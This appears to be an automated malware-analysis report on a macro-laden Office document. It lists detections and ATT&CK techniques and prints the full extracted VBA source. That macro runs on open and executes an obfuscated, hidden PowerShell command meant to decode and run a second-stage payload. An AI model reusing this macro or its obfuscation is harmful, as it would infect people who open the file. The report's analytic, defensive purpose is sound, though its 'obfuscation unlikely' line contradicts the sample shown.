MALICIOUS
356
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros that are automatically executed upon opening, as indicated by the AutoOpen and Document_Open heuristics. These macros construct and execute a PowerShell command designed to download and run a second-stage payload. The use of WScript.Shell and CreateObject further supports the malicious intent of executing external commands.
Heuristics 8
-
ClamAV: Doc.Downloader.5ddb7c-10001341-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.5ddb7c-10001341-0
-
VBA project inside OOXML medium 6 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
CreateObject("Wscript.Shell").Run Str End Sub -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
Dim Str As String Str = Str + "powershell -Exec bypass -NonI -W Hidden (('& ((GeT" Str = Str + "-VARIAble SXB*MDr*SXB).naMe[3,11,2]-joiNSXBSXB)( (" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
CreateObject("Wscript.Shell").Run Str End Sub -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "Module1" StrSub AutoOpen() MyMacro -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Sub Document_Open() MyMacro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 6570 bytes |
SHA-256: 0ebaa8278c172fcd9df1643c265222dc649611aae52de036c77d609dea55a838 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Workbook______________"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Worksheet______1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{B804F40B-1E6A-4A91-91F4-168684F12A52}{E1749664-84C1-49C1-A0F9-A6574B6D21D0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Module1"
StrSub AutoOpen()
MyMacro
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub MyMacro()
Dim Str As String
Str = Str + "powershell -Exec bypass -NonI -W Hidden (('& ((GeT"
Str = Str + "-VARIAble SXB*MDr*SXB).naMe[3,11,2]-joiNSXBSXB)( ("
Str = Str + " New-ObjeCT'+' mANAgement.AuToMaTION.PsCr'+'EDeNT"
Str = Str + "IaL SXB SXB,( SXB76492d1116743f0423413b16050a5345M"
Str = Str + "gB8AHMAYQBa'+'AE0AUwBZAEoAQgBWAHQANwAwAHcAO'+'QBLA"
Str = Str + "HMAVAAwAH'+'gA'+'L'+'wBZAHcAPQA9AHwAYQ'+'AxAD'+'QA"
Str = Str + "OQA1ADEAMAA5AGIANQAxADAANwA5ADgAZ'+'gBkADUAZAA4ADA"
Str = Str + "ANQAzAGIAYwA0ADkANAA1'+'ADEANAAyAGIA'+'MABiADYAM'+"
Str = Str + "'wB'+'mADIANwBhADIAO'+'AAzADIAMgBiAGEAZgBkADcANwAy"
Str = Str + "AGQAMAA3AGQAMgA0ADgAZgBhADAANwBiAGUANwBlADUAMwB'+'"
Str = Str + "lAGUANgBmADgAZQA1AGUANQBiAGUAMQBlAGUAYwAyADIAYgAwA"
Str = Str + "GIAYQA4ADUAYgBjAG'+'MAMQB'+'jAGMAMwA0AGIAMAA2AGIAY"
Str = Str + "QAzAGMANAAzAGQAM'+'gA0AGUAZg'+'AxADkAMgBlADYAOQBhA"
Str = Str + "GQAMAA3ADkANgA1ADkANQBhAGQAY'+'wBkADc'+'AOAA5'+'AG"
Str = Str + "QANQBhADEAM'+'AA2AGQAZAAxADkANgBhAGMAYQBkAGQAMwA2A"
Str = Str + "GYAOAAxADQANQAzADcAMQAxAGMAMQ'+'Bi'+'A'+'D'+'cAYgA"
Str = Str + "0ADIAOQA1AGUAYgBlAGEAZAA2ADcAYgA5ADkANgA1ADAANwBiA"
Str = Str + "DQANABhAGQ'+'AYwA1ADEAMwA4ADEAM'+'QA2'+'ADMAZQAwAG"
Str = Str + "QAZQA5AGQAZQA5AGMAOQBhADAAYwAyADYAO'+'QBiAGMAOABj'"
Str = Str + "+'ADcANgAzAGQANQA1AGMAZQA4ADk'+'AOQAxAGEAMQAwADQAO"
Str = Str + "A'+'A3ADk'+'AOABjAGMANgA4AGMA'+'YQA1ADAANgA5ADEAYQ"
Str = Str + "'+'BlAGQAYwBiAGMAZgAzAGMAZAA4ADIAZQA1ADgA'+'Z'+'gA"
Str = Str + "1AGYANgBjAGIAYQA0ADIAYQBkADMAYQAxADIAMAAxAGMANAAzA"
Str = Str + "'+'DEANgBmADMAMgA1ADYANgBhADQAZgA4AGEAMAA0ADQANwBk"
Str = Str + "ADkANgBkAGUANQA0AGEAYwA1ADQAMABmAGI'+'AZQBjADkAZQA"
Str = Str + "z'+'AGUAZQA5ADYANAA2AGMAMABhADcAZQBkAGYAZgBiAGUAMw"
Str = Str + "AxAGMAZQ'+'BiADgAMAA4ADUAMgBkAGUAZQA2AGYANgA3ADgA'"
Str = Str + "+'NABiADQANAAxAGIAMg'+'BjADgAMgBmADMAZAA4ADMAYwA2A"
Str = Str + "DgAYQA3AGEAYQBiAGIAMQA1AD'+'MAMgAxAGIAZgA3AGQA'+'M"
Str = Str + "QA5ADgA'+'ZgA3A'+'DYANAAzADcANwA1AGIANQAxADYAMgAyA"
Str = Str + "GYANABhADQAZgAwADIAYQA2AGUAOAA1AGQAMAAyADAANQ'+'Bl"
Str = Str + "ADAAYwBiADIANQAzADkAMAAyADkAYgBlADMANwAxADUAOQAyAG"
Str = Str + "IAMwA2AGUAYQA1AGMAMAA2ADcA'+'NAAzADgAYQBlADUANgAxA"
Str = Str + "DcAY'+'QA1ADgANgBkADQAMABkADkAMAAxADgAYQBmAGQAMABi"
Str = Str + "AGIAYgBiAGEAZQA1AGUANgA3AGMANQAzAGEANQA1AG'+'MAZAA"
Str = Str + "1ADUAOQA2ADgAMwA'+'2AGQANgBjADcAMwA1AGQANgBlAGQAOA"
Str = Str + "AzAGQANgBmADgANgA1AGYAYQA0ADkAN'+'A'+'BiADgANwA4AG"
Str = Str + "M'+'AOABhAGMAOQBmAGUAZQBjADIAMgA1ADAAMQAzAGEANwBmA"
Str = Str + "DYANwBmADQAMQA0ADAAMQA1ADIANwAyAGYAMwBkADAAZgA4ADY"
Str = Str + "ANwBiA'+'DcAZgAwAGQAYwA'+'wAGIAMAAwAGYANAA4'+'ADEA"
Str = Str + "ZAAyADAANQBiADYANgA5ADEAMABmADcAY'+'gBhAGQANQA2AGI"
Str = Str + "AMQBjADkAYwBlADUAZAA4ADgAMgA'+'1'+'ADkAZgA1ADkAOAA"
Str = Str + "zADAAZAA5AGEAZQA0ADkANwAyAGYANwA1AGUAMQAyAGYAYQAyA"
Str = Str + "DgAMQAxAGQAMAAzAGYAMgA5AGMANQA4AGYAOQ'+'BmADEANwAw"
Str = Str + "ADYAMQBhADUAYwA0AGYAMABiAGIA'+'MwBlAGMANgA5AGIAMgB"
Str = Str + "iAGUA'+'MgAxAGMAZABmADYAMgBiA'+'DgAMABhADkANgBlAGU"
Str = Str + "AOAB'+'jAGUAMwA2AG'+'Q'+'ANABmAGIAMQBjADkAMgA3ADAA"
Str = Str + "OABhADkAMwB'+'mADgANQBiAGMAZAAxAGEAZQBkADEAMwAxAGQ"
Str = Str + "AYwBlADIAMQBiAGUAMgBkADMANwBhADcAN'+'wBkAGYAMg'+'A"
Str = Str + "yADkAYwA5ADUAOAAyADkANAA4ADcAZgA4ADAANQBmADIAYQ'+'"
Str = Str + "AzADUAMABkAGIANQBjAGQAMAAzADMANwA2ADQAMgAzADMAYgA4"
Str = Str + "ADMAZQA1AD'+'AAYwBjADgAOQA5ADgAZAA3ADQAZA'+'BhADMA"
Str = Str + "YQAxADEAMgA4AGUANAA4ADgAZQBkAGIANgB'+'lAGMAZgBmADY"
Str = Str + "AMwAyAGQAMgBkAGMAMgBlADAAMAA1ADYAMw'+'A0ADgAYgAzAG"
Str = Str + "IAYwA0ADkAZQBlAGIAYgA'+'5ADcAYgBlAGUANwA1AGQAMABmA"
Str = Str + "DkAZAAzAGEAMwAwAD'+'gANwAzADgAYQA4ADcAZgBlADcANAA4"
Str = Str + "AGEANwA3AGQAZgBiADAANgAyAGUAYgA1AGQAZAA1ADUAOABiAD"
Str = Str + "MANABmADMAZABmADQANgA3AGIA'+'NQ'+'BjADQAOAA1ADYAMg"
Str = Str + "A5AGQAYQA1AGUAOAA4AGUAZQA3ADMANABkADEAZQA4AGIAMAAw"
Str = Str + "ADAAOAA4ADgAOQA3ADkAMAAyADAANAAwAGEAZQBmAG'+'UAMQB"
Str = Str + "lADkAYQBjADgAMQB'+'lAGQAMQA2ADkANgBmAGQAZgA3ADYANA"
Str = Str + "A2A'+'DMANgA0ADAAZgA2ADcAZAA1AGIANAAwADkAYgA2ADEAN"
Str = Str + "QA2ADIAOABkADAAZQBhAG'+'EAZABkAGEAMgAzAGIANgAzADMA"
Str = Str + "MAA1AGUAMQAzAGQAMwA0AGYAYgA5ADcAMgA'+'yADQAZAAzADg"
Str = Str + "AMgAy'+'ADQANgAzADYAMwBlADAAOQA2ADYAMABhAGQ'+'AYQA"
Str = Str + "4ADAAMQAzADUANgBjADMAMwAyADgANABmADQANABjADEANwA'+"
Str = Str + "'zAGI'+'AMgA5AGUAMABlAGYAMABh'+'AGIAN'+'wAwAGEAMAA"
Str = Str + "yADAAYQA3A'+'DIANQA4ADcANAA1A'+'DMAMgA4ADMAN'+'wBl"
Str = Str + "'+'ADkAYQA0ADAAOQA3ADMAYwBmAGQAZAAxADYAOQA2ADQAMgA"
Str = Str + "3ADIA'+'ZAAyADY'+'AZAA5ADYAMwBmAGIAYQBhADcAZAA4ADQ"
Str = Str + "AOQBkAGMAOAA4AGIAOQBhADEAMQBmADIAMgAxAGUANQBhAGQAM"
Str = Str + "AAyAGEAZgA5ADgANwAzAGEANwAwADEAMgBjAGEAYgA5ADIAMgB"
Str = Str + "hADIAZABkAGYAZgA1ADcANgBmADUANQAxADYAMQA1ADUANAA1A"
Str = Str + "DgAZQA1AGQAMAA3ADAAYQBkADgAYgAzADgAOAAyADU'+'ANgAx"
Str = Str + "AGMAOAA0AGEANwAzAGYANABhAA==SXB'+' a89conVERtto-sE"
Str = Str + "CuREstrING -k (2'+'27..242) ) '+').getNETworkCred"
Str = Str + "ENtIal().PaSSword)') -rePLaCe ([CHaR]97+[CHaR]56+"
Str = Str + "[CHaR]57),[CHaR]124 -rePLaCe ([CHaR]83+[CHaR]88+["
Str = Str + "CHaR]66),[CHaR]39) | & ( $shELliD[1]+$sHELLID[13]+"
Str = Str + "'X')"
CreateObject("Wscript.Shell").Run Str
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 24576 bytes |
SHA-256: 175121cfe070eb5e67c45451f02fba9eeba41956ad9897166b9f0a28c3852ee3 |
|||
|
Detection
ClamAV:
Doc.Downloader.5ddb7c-10001341-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.